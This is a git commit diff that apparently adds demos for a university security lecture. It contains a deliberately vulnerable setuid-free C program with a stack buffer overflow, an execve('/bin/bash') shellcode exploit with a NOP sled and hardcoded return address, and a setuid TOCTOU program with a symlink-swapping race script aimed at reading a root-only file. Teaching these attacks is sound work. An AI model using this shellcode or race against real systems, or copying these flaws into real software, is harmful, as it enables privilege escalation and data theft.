added demos
This commit is contained in:
parent
c95633f4eb
commit
58562dc628
|
@ -1,3 +1,6 @@
|
|||
# sfl-examples
|
||||
# Examples of the SFL lectures
|
||||
|
||||
Code examples of the SFL lecture
|
||||
Dear students,
|
||||
|
||||
In this repository, you can find all software demos and many code examples that are part of the SFL lecture series.
|
||||
In case you miss something, please send an email to christian.rossow [at] cs.uni-dortmund [dot] de.
|
||||
|
|
|
@ -0,0 +1,16 @@
|
|||
SOURCES = $(wildcard *.asm)
|
||||
OBJS = $(SOURCES:.asm=.o)
|
||||
EXECS = $(patsubst %.asm,%.runme,$(SOURCES))
|
||||
all: $(EXECS) bufoverflow
|
||||
|
||||
%.o: %.asm
|
||||
nasm -g -f elf64 $<
|
||||
|
||||
%.runme: %.o
|
||||
ld -o $@ $<
|
||||
|
||||
clean:
|
||||
rm -f *.o *.runme bufoverflow
|
||||
|
||||
bufoverflow:
|
||||
gcc bufoverflow.c -g -z execstack -o bufoverflow -O1 -fno-unroll-loops -fno-omit-frame-pointer -fno-dce -fno-dse
|
|
@ -0,0 +1,37 @@
|
|||
// usage: bufoverflow <filename>
|
||||
//
|
||||
// files with more than 512B content will cause overflows.
|
||||
// smaller files work just fine.
|
||||
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
|
||||
/*
|
||||
before exploit after exploit
|
||||
|
||||
+++++++++++++ +++++++++++++
|
||||
+ saved RIP + <-- rbp+8 + &shellc +---\
|
||||
+++++++++++++ +++++++++++++ |
|
||||
+ saved RBP + <-- rbp + anything + |
|
||||
+++++++++++++ +++++++++++++ |
|
||||
+ + + + |
|
||||
+ + + + |
|
||||
... ... ... ... |
|
||||
+ + + + |
|
||||
+ (512 B) + + + |
|
||||
+ array + <-- rbp-0x200 + shellcode +<--/
|
||||
+++++++++++++ rsp +++++++++++++
|
||||
*/
|
||||
|
||||
int mystr(char *fn) {
|
||||
char mystr[512];
|
||||
register FILE *f = fopen(fn, "rb");
|
||||
fread(mystr, 1024, 1, f); // VULNERABLE! reading 1024B into 512B buf
|
||||
return mystr[0];
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
if (argc != 2) { printf("too few args."); return 1; }
|
||||
return mystr(argv[1]);
|
||||
}
|
|
@ -0,0 +1,23 @@
|
|||
bits 64
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
times 128 nop
|
||||
|
||||
; 59 sys_execve const char *filename const char *const argv[] const char *const envp[]
|
||||
; (rdi, rsi, rdx, r10, r8, r9)
|
||||
mov rax, 59
|
||||
lea rdi, [rel binbash]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
syscall
|
||||
|
||||
times 5 nop
|
||||
|
||||
binbash:
|
||||
db '/bin/bash', 0x00
|
||||
|
||||
ALIGN 512 ; 512-byte alignment for this part
|
||||
times 8 nop ; overwrite saved rbp
|
||||
dq 0x7fffffffdcd0 ; overwrite rip ([rbp+8])
|
|
@ -0,0 +1,13 @@
|
|||
SOURCES = $(wildcard *.asm)
|
||||
OBJS = $(SOURCES:.asm=.o)
|
||||
EXECS = $(patsubst %.asm,%.runme,$(SOURCES))
|
||||
all: $(EXECS)
|
||||
|
||||
%.o: %.asm
|
||||
nasm -g -f elf64 $<
|
||||
|
||||
%.runme: %.o
|
||||
ld -o $@ $<
|
||||
|
||||
clean:
|
||||
rm -f *.o *.runme
|
|
@ -0,0 +1,35 @@
|
|||
bits 64
|
||||
|
||||
SECTION .data
|
||||
var1: dq 0x0
|
||||
var2: dq 0x0
|
||||
|
||||
SECTION .text
|
||||
global _start
|
||||
_start:
|
||||
int3
|
||||
|
||||
read:
|
||||
mov rax, 0
|
||||
add rax, 4
|
||||
mov rbx, rax
|
||||
sub rax, 4
|
||||
xor rax, 0x10101010
|
||||
|
||||
xor rax, rax
|
||||
sub rax, 1
|
||||
add rax, 1
|
||||
|
||||
mov rax, -1
|
||||
mov rax, 0xFFFFFFFFFFFFFFFF
|
||||
|
||||
mov [var1], rax
|
||||
mov rax, var1
|
||||
|
||||
exit:
|
||||
; sys_exit(42)
|
||||
mov rax,60 ; system call number (sys_exit)
|
||||
mov rdi,42 ; system call return value
|
||||
syscall
|
||||
|
||||
times 64 nop
|
|
@ -0,0 +1,38 @@
|
|||
bits 64
|
||||
|
||||
SECTION .data
|
||||
; empty
|
||||
echobuf db 1024
|
||||
|
||||
SECTION .text
|
||||
|
||||
global _start
|
||||
_start:
|
||||
;int3
|
||||
|
||||
read:
|
||||
; sys_read(stdin, buf, buflen)
|
||||
mov rax,0
|
||||
mov rdi,0 ; arg1: fd (0 = stdin)
|
||||
lea rsi,[echobuf] ; arg2: buffer
|
||||
mov rdx,1024 ; arg3: buflen
|
||||
syscall
|
||||
|
||||
test rax, rax
|
||||
jz exit
|
||||
|
||||
; sys_write(stdout, buf, buflen)
|
||||
mov rdx,rax ; arg3: buflen
|
||||
mov rax,1 ; system call number (1 = sys_write)
|
||||
mov rdi,1 ; arg1: fd (1 = stdout)
|
||||
lea rsi,[echobuf] ; arg2: buffer
|
||||
syscall
|
||||
jmp read
|
||||
|
||||
exit:
|
||||
; sys_exit(42)
|
||||
mov rax,60 ; system call number (sys_exit)
|
||||
mov rdi,0 ; system call return value
|
||||
syscall
|
||||
|
||||
times 64 nop
|
|
@ -0,0 +1,10 @@
|
|||
all: setuid-toctou
|
||||
|
||||
clean:
|
||||
sudo rm -f setuid-toctou
|
||||
|
||||
# file must be owned by root, hence we `chown`
|
||||
setuid-toctou:
|
||||
gcc setuid-toctou.c -o setuid-toctou &&\
|
||||
chmod u+s ./setuid-toctou &&\
|
||||
sudo chown root:root ./setuid-toctou
|
|
@ -0,0 +1,17 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Launch this script and then start
|
||||
# while true; do ./setuid-toctou ./symbolic_link ; done
|
||||
set -u
|
||||
set -e
|
||||
curdir=`pwd`
|
||||
|
||||
if [ ! -e ./setuid-toctou ]; then
|
||||
echo "program <setuid-toctou> not found. wrong directory?"
|
||||
exit -1
|
||||
fi
|
||||
|
||||
while true; do
|
||||
ln -f -s ${curdir}/hello ./symbolic_link # link to a user-readable file
|
||||
ln -f -s ${curdir}/secret ./symbolic_link # link to a root-readable file
|
||||
done
|
|
@ -0,0 +1,28 @@
|
|||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
|
||||
|
||||
void main(int argc, char *argv[]) {
|
||||
char buf[1024];
|
||||
int fd;
|
||||
char *filename = argv[1];
|
||||
|
||||
if (access(filename, R_OK) != 0) {
|
||||
//printf("file '%s' not accessible by user\n", filename);
|
||||
exit(-1); // original user lacks permission
|
||||
}
|
||||
|
||||
// file at path `filename` exists and is readable
|
||||
// by the original user (i.e., not just by root)
|
||||
memset(buf, 0, 1024);
|
||||
fd = open(filename, O_RDONLY);
|
||||
if (fd == -1) {
|
||||
//perror("error in open()");
|
||||
} else {
|
||||
read(fd, buf, 1024);
|
||||
printf("%s", buf);
|
||||
}
|
||||
}
|
Loading…
Reference in New Issue